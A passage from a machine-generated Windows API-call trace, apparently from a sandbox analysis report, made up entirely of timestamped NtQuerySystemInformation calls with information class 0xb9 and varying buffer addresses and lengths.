ResultLength=0x0) [0210.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x28, ResultLength=0x0) [0210.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x28, ResultLength=0x0) [0210.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x28, ResultLength=0x0) [0210.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5f0, Length=0x28, ResultLength=0x0) [0210.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe660, Length=0x28, ResultLength=0x0) [0210.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7b0, Length=0x38, ResultLength=0x0) [0210.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7b0, Length=0x38, ResultLength=0x0) [0210.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6e0, Length=0x28, ResultLength=0x0) [0210.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6e0, Length=0x28, ResultLength=0x0) [0210.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7b0, Length=0x38, ResultLength=0x0) [0210.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7b0, Length=0x38, ResultLength=0x0) [0210.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe550, Length=0x20, ResultLength=0x0) [0210.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4d0, Length=0x20, ResultLength=0x0) [0210.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4d0, Length=0x20, ResultLength=0x0) [0210.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4d0, Length=0x20, ResultLength=0x0) [0210.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe720, Length=0x20, ResultLength=0x0) [0210.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7b0, Length=0x38, ResultLength=0x0) [0210.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe640, Length=0x20, ResultLength=0x0) [0210.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5c0, Length=0x20, ResultLength=0x0) [0210.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5c0, Length=0x20, ResultLength=0x0) [0210.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5c0, Length=0x20, ResultLength=0x0) [0210.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7b0, Length=0x38, ResultLength=0x0) [0210.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe640, Length=0x20, ResultLength=0x0) [0210.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5c0, Length=0x20, ResultLength=0x0) [0210.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5c0, Length=0x20, ResultLength=0x0) [0210.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5c0, Length=0x20, ResultLength=0x0) [0210.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7b0, Length=0x38, ResultLength=0x0) [0210.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe640, Length=0x20, ResultLength=0x0) [0210.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5d0, Length=0x20, ResultLength=0x0) [0210.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5d0, Length=0x20, ResultLength=0x0) [0210.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8d8, Length=0x58, ResultLength=0x0) [0210.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x58, ResultLength=0x0) [0210.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x38, ResultLength=0x0) [0210.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4f0, Length=0x28, ResultLength=0x0) [0210.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4f0, Length=0x28, ResultLength=0x0) [0210.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4f0, Length=0x28, ResultLength=0x0) [0210.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4f0, Length=0x28, ResultLength=0x0) [0210.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe560, Length=0x28, ResultLength=0x0) [0210.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x38, ResultLength=0x0) [0210.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5e0, Length=0x28, ResultLength=0x0) [0210.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5e0, Length=0x28, ResultLength=0x0) [0210.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x38, ResultLength=0x0) [0210.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe540, Length=0x20, ResultLength=0x0) [0210.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4c0, Length=0x20, ResultLength=0x0) [0210.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4c0, Length=0x20, ResultLength=0x0) [0210.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4c0, Length=0x20, ResultLength=0x0) [0210.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x38, ResultLength=0x0) [0210.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe540, Length=0x20, ResultLength=0x0) [0210.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4d0, Length=0x20, ResultLength=0x0) [0210.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4d0, Length=0x20, ResultLength=0x0) [0210.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x58, ResultLength=0x0) [0210.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x38, ResultLength=0x0) [0210.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4f0, Length=0x28, ResultLength=0x0) [0210.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4f0, Length=0x28, ResultLength=0x0) [0210.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4f0, Length=0x28, ResultLength=0x0) [0210.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4f0, Length=0x28, ResultLength=0x0) [0210.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe560, Length=0x28, ResultLength=0x0) [0210.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x38, ResultLength=0x0) [0210.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5e0, Length=0x28, ResultLength=0x0) [0210.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5e0, Length=0x28, ResultLength=0x0) [0210.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe480, Length=0x20, ResultLength=0x0) [0210.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe400, Length=0x20, ResultLength=0x0) [0210.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe400, Length=0x20, ResultLength=0x0) [0210.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe400, Length=0x20, ResultLength=0x0) [0210.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x38, ResultLength=0x0) [0210.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x38, ResultLength=0x0) [0210.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe540, Length=0x20, ResultLength=0x0) [0210.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4d0, Length=0x20, ResultLength=0x0) [0210.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4d0, Length=0x20, ResultLength=0x0) [0210.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x58, ResultLength=0x0) [0210.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x38, ResultLength=0x0) [0210.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4f0, Length=0x28, ResultLength=0x0) [0210.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4f0, Length=0x28, ResultLength=0x0) [0210.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4f0, Length=0x28, ResultLength=0x0) [0210.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4f0, Length=0x28, ResultLength=0x0) [0210.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe560, Length=0x28, ResultLength=0x0) [0210.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x38, ResultLength=0x0) [0210.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5e0, Length=0x28, ResultLength=0x0) [0210.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5e0, Length=0x28, ResultLength=0x0) [0210.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x38, ResultLength=0x0) [0210.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe540, Length=0x20, ResultLength=0x0) [0210.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4c0, Length=0x20, ResultLength=0x0) [0210.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4c0, Length=0x20, ResultLength=0x0) [0210.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4c0, Length=0x20, ResultLength=0x0) [0210.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x38, ResultLength=0x0) [0210.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe540, Length=0x20, ResultLength=0x0) [0210.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4d0, Length=0x20, ResultLength=0x0) [0210.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4d0, Length=0x20, ResultLength=0x0) [0210.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.105] 